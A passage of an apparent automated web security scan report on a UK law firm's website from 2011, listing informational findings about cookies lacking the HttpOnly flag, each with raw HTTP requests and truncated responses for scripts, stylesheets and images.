Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 874
Content-Type: text/css; charset=utf-8
Expires: Fri, 15 Apr 2011 15:13:10 GMT
ETag: dfa8f83b73614f279eafca3e81ebf73d
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

/* ---------- Hide ---------- */

div.headerinfo,
div.headermain hr,
div.hometop,
div.main hr,
div.navpri,
div.homeleftcol,
div.headermain ul,
div.headerinfo,
div.footermiddle,
div.footerright,
div.pa
...[SNIP]...

2.9. http://www.dac.co.uk/documents/js/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/jquery.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/js/jquery.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 77538
Content-Type: application/x-javascript
Expires: Fri, 15 Apr 2011 15:13:11 GMT
ETag: 8fc0bbf99a6c4564886ffdaafeed5e70
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 5a4f5b5f91d04c598de1c72015826e61
EON-Expires: 60
EON-ResourceIdentifier: 5a4f5b5f91d04c598de1c72015826e61
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:01 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-
...[SNIP]...

2.10. http://www.dac.co.uk/documents/js/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/main.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/js/main.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 8155
Content-Type: application/x-javascript
Expires: Fri, 15 Apr 2011 15:13:11 GMT
ETag: 55f82d96962b45f08f84de6169481277
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 22979c752ae14b419d1859123923bbc0
EON-Expires: 60
EON-ResourceIdentifier: 22979c752ae14b419d1859123923bbc0
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:01 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

...// JavaScript Document

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
docu
...[SNIP]...

2.11. http://www.dac.co.uk/documents/js/quicklinks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/quicklinks.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/js/quicklinks.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 9890
Content-Type: application/octet-stream
Expires: Fri, 15 Apr 2011 15:13:10 GMT
ETag: 9470264aa26e4093986dcc48817ea058
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 7f7309b95003480aa45f6d8ac6a712ac
EON-Expires: 60
EON-ResourceIdentifier: 7f7309b95003480aa45f6d8ac6a712ac
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

...// Jquery
$(document).ready(function() {

var add_quick_link_text = 'add a quick link';
var remove_quick_link_text = 'remove quick link';

if ($("#container.es-ES").length > 0) {
...[SNIP]...

2.12. http://www.dac.co.uk/documents/js/sifr-config.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/sifr-config.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/js/sifr-config.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 4229
Content-Type: application/x-javascript
Expires: Fri, 15 Apr 2011 15:13:13 GMT
ETag: a7cba7d25f024429b388bd6f19f0f8e4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 49947b70c4db4a35819a0124f504ac2e
EON-Expires: 60
EON-ResourceIdentifier: 49947b70c4db4a35819a0124f504ac2e
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:03 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:03 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:02 GMT

   
   var cochin = {
       src: 'cochin.swf',
       ratios: [7, 1.32, 11, 1.31, 13, 1.24, 14, 1.25, 19, 1.23, 27, 1.2, 34, 1.19, 42, 1.18, 47, 1.17, 48, 1.18, 69, 1.17, 74, 1.16, 75, 1.17, 1.16]
   };
   
   var
...[SNIP]...

2.13. http://www.dac.co.uk/documents/js/sifr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/sifr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/js/sifr.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 29344
Content-Type: application/octet-stream
Expires: Fri, 15 Apr 2011 15:13:13 GMT
ETag: 2c848af05692430489a6c1a146d72fa1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 8bc104ddb98044d28079a57172b44d6b
EON-Expires: 60
EON-ResourceIdentifier: 8bc104ddb98044d28079a57172b44d6b
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:03 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:03 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:02 GMT

/*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://novemberbo
...[SNIP]...

2.14. http://www.dac.co.uk/documents/js/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/js/swfobject.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/js/swfobject.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 6880
Content-Type: application/x-javascript
Expires: Fri, 15 Apr 2011 15:13:13 GMT
ETag: 2d132ecfad864b6e8a3fc96d76e2d6da
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 8c9ebcf262ef48df8b5fc6fc3c5f846f
EON-Expires: 60
EON-ResourceIdentifier: 8c9ebcf262ef48df8b5fc6fc3c5f846f
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:03 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:03 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:02 GMT

/**
* SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource
...[SNIP]...

2.15. http://www.dac.co.uk/documents/swfs/dac-iris-banner.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /documents/swfs/dac-iris-banner.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /documents/swfs/dac-iris-banner.swf HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; lang=en-GB; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 48805
Content-Type: application/x-shockwave-flash
Expires: Fri, 15 Apr 2011 15:13:17 GMT
ETag: 90824ee5417e448d99f1210052619adb
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 55956180e07249d7b7ddf8fbd2d80b65
EON-Expires: 60
EON-ResourceIdentifier: 55956180e07249d7b7ddf8fbd2d80b65
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:07 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:07 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:07 GMT

CWS.w...x....T\....M.....Cp.q    N....k.............    ........{.}..7.y.F...5.W.....Y........!>..6.................%I]..l...Z..f..v|,,..........,l...,..,..Lo.L.n6...L6...B.C..8.A....mmH.j...:9
.........
...[SNIP]...

2.16. http://www.dac.co.uk/file.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /file.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /file.axd?pointerid=c49e2384f7ac46ebbe6f274078ad7fa8 HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; lang=en-GB; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 599
Content-Type: image/gif
Expires: Fri, 15 Apr 2011 15:13:16 GMT
ETag: 938da87164604b5d86dd344384885715
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 78f7a52a128b47d1ab1a64e5b73de974
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:06 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:06 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:05 GMT

GIF89a$...............!...A.p....\........O...\b.os.......O..\A.....s.y..A.ADb.f..Q.....O...k........1...3...c..Ds....J1...A.......]G.....O......M7P.\.Db.fb....3.....\..y.....A...b.....A...w{{........
...[SNIP]...

2.17. http://www.dac.co.uk/gatag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /gatag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gatag.js HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 2625
Content-Type: application/x-javascript; charset=utf-8
Expires: Fri, 15 Apr 2011 15:13:14 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:04 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:03 GMT


//    This javascript tags file downloads and external links in Google Analytics.
//    You need to be using the Google Analytics New Tracking Code (ga.js)
//    for this script to work.
//    To use, place
...[SNIP]...

2.18. http://www.dac.co.uk/multimedia/maps/offices/bouverie-street.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /multimedia/maps/offices/bouverie-street.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /multimedia/maps/offices/bouverie-street.gif?h=345&w=345&culture=en HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 26973
Content-Type: image/gif
Expires: Fri, 15 Apr 2011 15:31:26 GMT
ETag: 71ac87b7495f4adebbc85086c973a1cf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 191b2f8110364109a835547b218cc184
EON-Expires: 60
EON-ResourceIdentifier: 191b2f8110364109a835547b218cc184
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:16 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:16 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:16 GMT

GIF89aY.Y..............zzvv...Wq....NZs......~...........?::......z..M[.............333..................ssj...q...........IOO.4.jba........................it....#. ...k........}.....TNM...<77...Vc|.
...[SNIP]...

2.19. http://www.dac.co.uk/multimedia/maps/offices/gracechurch-street.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /multimedia/maps/offices/gracechurch-street.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /multimedia/maps/offices/gracechurch-street.gif?h=345&w=345&culture=en HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 22158
Content-Type: image/gif
Expires: Fri, 15 Apr 2011 15:31:26 GMT
ETag: ba0c5ba5297646129b4b3e0f213595c5
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 9e79a4f1cf83420f973ce677808672b4
EON-Expires: 60
EON-ResourceIdentifier: 9e79a4f1cf83420f973ce677808672b4
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:16 GMT; path=/
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:16 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:16 GMT

GIF89aY.Y....#. ...............{{zttt............DIW......|...........333...u.........................al.............JJJ.........kkk......o.....fff............>:;gw.*'*..................}...........Y
...[SNIP]...

2.20. http://www.dac.co.uk/publications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /publications

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /publications HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/about
